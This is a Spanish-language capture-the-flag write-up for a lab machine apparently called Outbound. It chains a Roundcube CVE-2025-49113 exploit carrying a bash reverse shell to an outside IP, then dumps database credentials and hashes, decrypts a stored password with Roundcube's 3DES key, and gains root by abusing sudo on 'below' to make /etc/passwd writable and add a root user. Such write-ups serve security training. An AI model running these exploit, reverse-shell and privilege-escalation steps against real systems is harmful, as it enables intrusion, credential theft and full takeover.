Outbound

Credenciales por default:

tyler / LhKL1o9Nm3X2

Enumeración

       │ File: targeted
───────┼─────────────────────────────────────────────────────────────────────────
   1   │ # Nmap 7.95 scan initiated Sat Jul 12 21:04:41 2025 as: /usr/lib/nmap/nm
       │ ap --privileged -sC -sV -p22,80 -oN targeted 10.10.11.77
   2   │ Nmap scan report for mail.outbound.htb (10.10.11.77)
   3   │ Host is up (0.28s latency).
   4   │ 
   5   │ PORT   STATE SERVICE VERSION
   6   │ 22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; pr
       │ otocol 2.0)
   7   │ | ssh-hostkey: 
   8   │ |   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
   9   │ |_  256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
  10   │ 80/tcp open  http    nginx 1.24.0 (Ubuntu)
  11   │ |_http-trane-info: Problem with XML parsing of /evox/about
  12   │ |_http-title: Roundcube Webmail :: Welcome to Roundcube Webmail
  13   │ |_http-server-header: nginx/1.24.0 (Ubuntu)
  14   │ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  15   │ 
  16   │ Service detection performed. Please report any incorrect results at http
       │ s://nmap.org/submit/ .
  17   │ # Nmap done at Sat Jul 12 21:05:01 2025 -- 1 IP address (1 host up) scan
       │ ned in 19.86 seconds

Entramos a la web:

Roundcube ≤ 1.6.10

Verificando la versión:

La versión de Roundcube Webmail encontrada es ≤ 1.6.10, que es vulnerable a un CVE-2025-49113. Esto permite ejecutar un comando remoto a través de la aplicación web.

Exploit usado:

GitHub - fearsoff-org/CVE-2025-49113GitHub

php CVE-2025-49113.php 'http://mail.outbound.htb' 'tyler' 'LhKL1o9Nm3X2' 'bash -c "bash -i >& /dev/tcp/10.10.16.8/4444 0>&1"'

Encontrar Configuración de la Base de Datos:

Accedemos al directorio /var/www/html/roundcube/config en el servidor comprometido y encontramos el archivo de configuración de la base de datos config.inc.php. Dentro de este archivo se encontraron las credenciales de la base de datos:

Usuario: roundcube
Contraseña: RCDBPass2025

www-data@mail:/var/www/html/roundcube/config$ cat config.inc.php

Se ecnontraron credenciales de la bd:

roundcube/RCDBPass2025

Acceso a la Base de Datos MySQL:

Utilizando las credenciales obtenidas, nos conectamos a la base de datos MySQL para explorar las tablas y obtener más información sobre los usuarios.

Comandos ejecutados:

mysql -h localhost -u roundcube -p'RCDBPass2025' roundcube -e 'show tables;'

Y se encontraron varios hashes

mysql -h localhost -u roundcube -p'RCDBPass2025' roundcube -e 'SELECT * FROM users;'

Usuario: jacob
- Client Hash: hpLLqLwmqbyihpi7
Usuario: mel
- Client Hash: GCrPGMkZvbsnc3xv
Usuario: tyler
- Client Hash: Y2Rz3HTwxwLJHevI

Tambien se encontro un hash bycrap: en /var/www/html/roundcube/bin/decrypt.sh

Crakeamos el hash con el script:

Cracking del Hash de Contraseña:

Se encontró un hash de contraseña cifrado en el script decrypt.sh en el directorio /var/www/html/roundcube/bin. El hash fue descifrado utilizando un script en Python con la librería PyCrypto para obtener la contraseña de jacob.

Script de descifrado:

from Crypto.Cipher import DES3
from base64 import b64decode

des_key = b'rcmail-!24ByteDESkey*Str'
encrypted_password = "L7Rv00A8TuwJAr67kITxxcSgnIk25Am/"

data = b64decode(encrypted_password)
iv = data[:8]
ciphertext = data[8:]

cipher = DES3.new(des_key, DES3.MODE_CBC, iv=iv)
decrypted = cipher.decrypt(ciphertext)

cleaned_password = decrypted.rstrip(b"\0").decode('utf-8', errors='ignore')

print("[+] Decrypted password for 'jacob':", cleaned_password)

Tenemos la contraseña de jacob:

su jabob 595mO8DmwGeD

Exploit Using Below to Escalate Privileges

Se verificó la configuración de los permisos sudo para el usuario jacob y se encontró que se podía ejecutar el programa below con privilegios de sudo sin necesidad de una contraseña.

Explotación:

Crear un symlink a /etc/passwd:

bash

rm -f /var/log/below/error_root.log
ln -sf /etc/passwd /var/log/below/error_root.log  # -sf forza la creación del enlace

Ejecutar below record para activar el servicio:

sudo /usr/bin/below record &  # Ejecuta en segundo plano
sleep 2  # Espera a que below procese el archivo
pkill below  # Termina el proceso

Verificar permisos de /etc/passwd:
```
ls -la /etc/passwd
```
- Salida esperada: -rw-rw-rw- (el archivo ahora es editable por cualquier usuario).
Añadir un nuevo usuario root:
```
echo "bilal:$(openssl passwd -1 bilal):0:0:root:/root:/bin/bash" >> /etc/passwd
```
- Explicación:
  - bilal: Nombre del nuevo usuario.
  - $(openssl passwd -1 bilal): Hash MD5 de la contraseña "bilal".
  - 0:0: UID y GID de root (privilegios totales).
  - /root:/bin/bash: Home directory y shell de root.

Acceder como el nuevo usuario root:

su bilal
Password: bilal  # Ingresa la contraseña

PreviousArtificial NextUnrested

Last updated 6 months ago

hashtagEnumeración

hashtagRoundcube ≤ 1.6.10

hashtagExploit Using Below to Escalate Privileges

Enumeración

Roundcube ≤ 1.6.10

Exploit Using Below to Escalate Privileges